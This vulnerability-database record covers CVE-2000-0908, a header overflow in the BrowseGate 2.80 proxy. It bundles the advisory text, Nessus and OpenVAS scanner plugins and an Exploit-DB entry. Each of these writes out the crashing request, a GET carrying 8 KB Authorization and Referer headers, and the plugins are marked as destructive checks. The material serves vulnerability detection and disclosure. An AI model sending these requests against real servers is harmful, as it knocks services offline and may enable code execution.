ID CVE-2000-0908 Type cve Reporter NVD Modified 2017-10-09T21:29:21
Description
BrowseGate 2.80 allows remote attackers to cause a denial of service and possibly execute arbitrary commands via long Authorization or Referer MIME headers in the HTTP request.
{"nessus": [{"lastseen": "2019-02-21T01:07:44", "bulletinFamily": "scanner", "description": "It is possible to kill the remote server by sending it an invalid request with too long HTTP headers (Authorization and Referer).\n\nBrowseGate proxy is known to be vulnerable to this flaw.\n\nAn attacker could exploit this vulnerability to cause the web server to crash continually or to execute arbitrary code on the system.", "modified": "2018-06-29T00:00:00", "id": "BROWSEGATE_HTTP_OVERFLOWS.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=11130", "published": "2002-09-21T00:00:00", "title": "BrowseGate HTTP MIME Headers Remote Overflow", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# This is an old bug. I don't know if we need _two_ overflows to\n# crash BrowseGate or if this crashes any other web server\n#\n# Script audit and contributions from Carmichael Security\n# Erik Anderson <eanders@carmichaelsecurity.com> (nb: this domain no longer exists)\n# Added BugtraqID and CVE\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(11130);\n script_version(\"1.28\");\n script_cvs_date(\"Date: 2018/06/29 12:01:03\");\n\n script_cve_id(\"CVE-2000-0908\");\n script_bugtraq_id(1702);\n\n script_name(english:\"BrowseGate HTTP MIME Headers Remote Overflow\");\n script_summary(english:\"Too long HTTP headers kill BrowseGate\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"It may be possible to execute arbitrary code on the remote web server.\");\n script_set_attribute(attribute:\"description\", value:\n\"It is possible to kill the remote server by sending it an invalid\nrequest with too long HTTP headers (Authorization and Referer).\n\nBrowseGate proxy is known to be vulnerable to this flaw.\n\nAn attacker could exploit this vulnerability to cause the web server\nto crash continually or to execute arbitrary code on the system.\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade your software or protect it with a filtering reverse proxy\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2000/09/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2002/09/21\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_copyright(english:\"This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Web Servers\");\n\n script_dependencie(\"http_version.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = get_http_port(default:80);\n\nif (http_is_dead(port: port)) exit(1, \"The web server on port \"+port+\" is dead already.\");\n\nr = http_send_recv3(port: port, item: \"/\", method: 'GET',\n add_headers:\n make_array( \"Authorization\", \"Basic\"+crap(8192),\n \t\t\"Referer\", \"http://www.example.com/\"+crap(8192) ) );\n\n#\t\"From: nessus@example.com\\r\\n\",\n#\t\"If-Modified-Since: Sat, 29 Oct 1994 19:43:31 GMT\\r\\n\",\n#\t\"UserAgent: Nessus 1.2.6\\r\\n\\r\\n\n\nif (http_is_dead(port: port, retry: 3)) { security_hole(port); }\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-12-08T11:44:13", "bulletinFamily": "scanner", "description": "It was possible to kill the BrowseGate \nproxy by sending it an invalid request with too long HTTP headers\n(Authorization and Referer)\n\nA cracker may exploit this vulnerability to make your web server\ncrash continually or even execute arbirtray code on your system.", "modified": "2017-12-07T00:00:00", "published": "2005-11-03T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=11130", "id": "OPENVAS:11130", "title": "BrowseGate HTTP headers overflows", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: browsegate_http_overflows.nasl 8023 2017-12-07 08:36:26Z teissa $\n# Description: BrowseGate HTTP headers overflows\n#\n# Authors:\n# Michel Arboi <arboi@alussinan.org>\n# Script audit and contributions from Carmichael Security <http://www.carmichaelsecurity.com>\n# Erik Anderson <eanders@carmichaelsecurity.com>\n# Added BugtraqID and CVE\n#\n# Copyright:\n# Copyright (C) 2002 Michel Arboi\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"It was possible to kill the BrowseGate \nproxy by sending it an invalid request with too long HTTP headers\n(Authorization and Referer)\n\nA cracker may exploit this vulnerability to make your web server\ncrash continually or even execute arbirtray code on your system.\";\n\ntag_solution = \"upgrade your software or protect it with a filtering reverse proxy\";\n\n# This is an old bug. I don't know if we need _two_ overflows to \n# crash BrowseGate or if this crashes any other web server\n\nif(description)\n{\n script_id(11130);\n script_version(\"$Revision: 8023 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-07 09:36:26 +0100 (Thu, 07 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(1702);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cve_id(\"CVE-2000-0908\");\n name = \"BrowseGate HTTP headers overflows\";\n script_name(name);\n \n\n \n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n \n script_copyright(\"This script is Copyright (C) 2002 Michel Arboi\");\n family = \"Gain a shell remotely\";\n script_family(family);\n script_dependencies(\"find_service.nasl\", \"http_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\n\nport = get_http_port(default:80);\n\nif (http_is_dead(port: port)) exit(0);\n\nsoc = http_open_socket(port);\nif(! soc) exit(0);\n\nr = string(\"GET / HTTP/1.0\\r\\n\", \n\t\"Authorization: Basic\", crap(8192), \"\\r\\n\", \n\t\"From: openvas@example.com\\r\\n\",\n\t\"If-Modified-Since: Sat, 29 Oct 1994 19:43:31 GMT\\r\\n\",\n\t\"Referer: http://www.example.com/\", crap(8192), \"\\r\\n\",\n\t\"UserAgent: OpenVAS 1.2.6\\r\\n\\r\\n\");\n\nsend(socket:soc, data: r);\nr = http_recv(socket:soc);\nhttp_close_socket(soc);\n\nif (http_is_dead(port: port)) { security_message(port); }\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:35:52", "bulletinFamily": "scanner", "description": "It was possible to kill the BrowseGate \nproxy by sending it an invalid request with too long HTTP headers\n(Authorization and Referer)\n\nA cracker may exploit this vulnerability to make your web server\ncrash continually or even execute arbirtray code on your system.", "modified": "2018-04-06T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:136141256231011130", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231011130", "title": "BrowseGate HTTP headers overflows", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: browsegate_http_overflows.nasl 9348 2018-04-06 07:01:19Z cfischer $\n# Description: BrowseGate HTTP headers overflows\n#\n# Authors:\n# Michel Arboi <arboi@alussinan.org>\n# Script audit and contributions from Carmichael Security <http://www.carmichaelsecurity.com>\n# Erik Anderson <eanders@carmichaelsecurity.com>\n# Added BugtraqID and CVE\n#\n# Copyright:\n# Copyright (C) 2002 Michel Arboi\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"It was possible to kill the BrowseGate \nproxy by sending it an invalid request with too long HTTP headers\n(Authorization and Referer)\n\nA cracker may exploit this vulnerability to make your web server\ncrash continually or even execute arbirtray code on your system.\";\n\ntag_solution = \"upgrade your software or protect it with a filtering reverse proxy\";\n\n# This is an old bug. I don't know if we need _two_ overflows to \n# crash BrowseGate or if this crashes any other web server\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.11130\");\n script_version(\"$Revision: 9348 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:01:19 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(1702);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cve_id(\"CVE-2000-0908\");\n name = \"BrowseGate HTTP headers overflows\";\n script_name(name);\n \n\n \n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n \n script_copyright(\"This script is Copyright (C) 2002 Michel Arboi\");\n family = \"Gain a shell remotely\";\n script_family(family);\n script_dependencies(\"find_service.nasl\", \"http_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\n\nport = get_http_port(default:80);\n\nif (http_is_dead(port: port)) exit(0);\n\nsoc = http_open_socket(port);\nif(! soc) exit(0);\n\nr = string(\"GET / HTTP/1.0\\r\\n\", \n\t\"Authorization: Basic\", crap(8192), \"\\r\\n\", \n\t\"From: openvas@example.com\\r\\n\",\n\t\"If-Modified-Since: Sat, 29 Oct 1994 19:43:31 GMT\\r\\n\",\n\t\"Referer: http://www.example.com/\", crap(8192), \"\\r\\n\",\n\t\"UserAgent: OpenVAS 1.2.6\\r\\n\\r\\n\");\n\nsend(socket:soc, data: r);\nr = http_recv(socket:soc);\nhttp_close_socket(soc);\n\nif (http_is_dead(port: port)) { security_message(port); }\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:19:56", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nISS X-Force ID: 5270\n[CVE-2000-0908](https://vulners.com/cve/CVE-2000-0908)\nBugtraq ID: 1702\n", "modified": "2000-09-18T00:00:00", "published": "2000-09-18T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:1565", "id": "OSVDB:1565", "type": "osvdb", "title": "NetcPlus BrowseGate MIME Headers Remote Overflow", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-02T13:47:08", "bulletinFamily": "exploit", "description": "NetcPlus BrowseGate 2.80 DoS Vulnerability. CVE-2000-0908. Dos exploit for windows platform", "modified": "2000-09-21T00:00:00", "published": "2000-09-21T00:00:00", "id": "EDB-ID:20233", "href": "https://www.exploit-db.com/exploits/20233/", "type": "exploitdb", "title": "NetcPlus BrowseGate 2.80 DoS Vulnerability", "sourceData": "source: http://www.securityfocus.com/bid/1702/info\r\n\r\nNetcPlus BrowseGate 2.80 will crash as the result of an invalid read error if a number of character strings consisting of 8 KB are inserted into GET request arguments through port 80.\r\n\r\nFor example:\r\n\r\nGET / HTTP/1.0<cr>\r\nAuthorization: Basic(8 KB string of characters)<cr>\r\nFrom: email@address.com<cr>\r\nIf-Modified-Since: Sat, 29 Oct 1994 19:43:31 GMT<cr>\r\nReferer: http://referrer/(8 KB string of characters)<cr>\r\nUserAgent: Browser 1.1<cr>\r\n<cr><cr>\r\n\r\nwill cause brwgate.exe to fail and a restart of the service is required in order to gain normal functionality.\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/20233/"}]}